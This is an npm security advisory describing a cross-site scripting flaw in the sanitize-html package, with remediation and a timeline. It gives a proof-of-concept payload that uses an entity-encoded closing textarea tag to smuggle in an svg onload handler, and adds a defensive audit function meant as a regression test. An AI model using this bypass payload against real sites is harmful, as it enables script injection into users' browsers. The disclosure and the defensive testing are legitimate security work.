npm

Severity: moderate

Cross-Site Scripting

sanitize-html

Overview

Affected versions of sanitize-html are vulnerable to cross-site scripting when the allowedTags option includes at least one tag that is also listed in nonTextTags (for example textarea). Text inside such a tag is emitted with its HTML entities decoded, so an encoded closing tag like &lt;/textarea&gt; becomes a real </textarea> in the output, closing the element early and exposing markup that was never checked against the allowlist.

Proof of Concept

var sanitizeHtml = require('sanitize-html');

// The entity-encoded closing tag sits inside the textarea's text content;
// the svg element that follows it is not in allowedTags.
var dirty = '!<textarea>&lt;/textarea&gt;<svg/onload=prompt`xs`&gt;</textarea>!';
var clean = sanitizeHtml(dirty, {
    allowedTags: [ 'textarea' ]   // textarea is one of the default nonTextTags
});

console.log(clean);

// Output from an affected version: the entities have been decoded, so the
// browser sees a closed textarea followed by a live <svg onload=...> element.
// !<textarea></textarea><svg/onload=prompt`xs`></textarea>!
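The output above is what a browser will tokenize, so a useful regression check is an independent, conservative second pass over a sanitizer's output that flags any tag outside the allowlist and any on* attribute. The following is an added example written for this page, not code from the advisory or from sanitize-html; auditSanitizedHtml and its constructed input are assumptions of this example.

```javascript
// Conservative post-sanitization audit: tokenize start tags the way the HTML
// tokenizer does and report anything the allowlist should have excluded.

// Start tag: "<" + name + everything up to ">". A "/" right after the name
// (as in "<svg/onload=...>") terminates the name, exactly as in the HTML spec.
const TAG_RE = /<([a-zA-Z][^\s/>]*)([^>]*)>/g;
// One attribute: name, optionally "=" and a quoted or unquoted value.
const ATTR_RE = /([^\s/=>]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s>]+))?/g;

// Returns findings for markup that should not have survived sanitization:
// tags not in allowedTags, and on* event-handler attributes on any tag.
function auditSanitizedHtml(html, allowedTags) {
  const allowed = new Set(allowedTags.map((t) => t.toLowerCase()));
  const findings = [];
  for (const tag of html.matchAll(TAG_RE)) {
    const name = tag[1].toLowerCase();
    if (!allowed.has(name)) {
      findings.push({ kind: 'disallowed-tag', tag: name });
    }
    for (const attr of tag[2].matchAll(ATTR_RE)) {
      const attrName = attr[1].toLowerCase();
      if (attrName.startsWith('on')) {
        findings.push({ kind: 'event-handler', tag: name, attr: attrName });
      }
    }
  }
  return findings;
}

// Constructed input: the string the advisory's PoC printed from an affected
// version of sanitize-html.
const POC_OUTPUT = '!<textarea></textarea><svg/onload=prompt`xs`></textarea>!';

// The svg tag is outside the allowlist and carries an onload handler:
// [{ kind: 'disallowed-tag', tag: 'svg' },
//  { kind: 'event-handler', tag: 'svg', attr: 'onload' }]
console.log(auditSanitizedHtml(POC_OUTPUT, ['textarea']));

// Correctly escaped textarea content produces no findings.
console.log(auditSanitizedHtml('<textarea>a &lt;/textarea&gt; b</textarea>', ['textarea']));
```

Wiring this audit into a test suite as `expect(auditSanitizedHtml(sanitizeHtml(input, opts), opts.allowedTags)).toEqual([])` turns this advisory's payload into a permanent regression test.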

Remediation

Update to version 1.11.4 or later.


Advisory timeline

  1. published

    Advisory published
    Apr 11th, 2017
  2. reported

    Initial report by Andrew Krasichkov
    Oct 27th, 2016